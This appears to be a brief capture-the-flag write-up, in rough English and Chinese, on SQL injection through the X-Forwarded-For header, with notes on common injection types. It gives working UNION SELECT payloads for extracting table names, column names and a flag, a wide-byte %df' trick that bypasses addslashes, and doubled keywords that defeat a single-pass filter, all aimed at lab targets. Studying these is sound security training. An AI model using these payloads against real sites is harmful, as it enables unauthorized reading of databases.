topic:
(1) the main focus of the first injection method and location in: X-Forwarded-For, User-Agent, Referer these places, the idea of holding "I hope unprotected injection" of a few of these places were a simple injection tests found the presence of X-Forwarded-For injection
(2) may be determined that the presence of injection X-Forwarded-For, then injected X-Forwarded-For: union select 1,2,3, flag from flag,
You can get the last injection results
Knowledge added:
. 1, X-Forwarded-the For- ( XFF ) is used to identify through HTTP proxy or load balancing connection mode to the Web server to the client the most original IP address of the HTTP request header field
2.User Agent Chinese called user agent , referred to as UA, it is a special string head, so that the server can identify the customer using the operating system and version, CPU type, browser and version, browser rendering engine, browser language, browser plug-ins and so on.
3.Referer https://www.cnblogs.com/bukudekong/p/3829852.html
4.常见注入类型
(1).常规注入
获取表名----------------
http://xxxxxx/sql1/index.php?id=1' union select 1,2,table_name from information_schema.tables where table_schema=database()%23
获取列名----------------
http://xxxxxx/sql1/index.php?id=1' union select 1,2,column_name from information_schema.columns where table_name='flag'%23
获取信息----------------
http://xxxxxx/sql1/index.php?id=1' union select 1,2,flag from flag%23
(2).宽字节注入
%df'会成为一个中文字符(也就是吃掉\,绕过过滤addslashes函数的规则)
http://xxxxxx/sql2/index.php?id=1%df' union select 1,2,flag from flag %23
(3).关键字替换
以替换关键字的方式过滤,只替换一次,故可将关键字插入来达到绕过目的
http://xxxxxx/sql3/index.php?id=1' uniunionon selselectect 1,2,flag frfromom flag %23
参考:
1. 常见注入类型 : https://www.jianshu.com/p/18e94eb06c2a
2. Exp10 Final 类CTF(Webug3.0漏洞靶场—渗透基础) :https://www.cnblogs.com/PegasusLife/p/10886420.html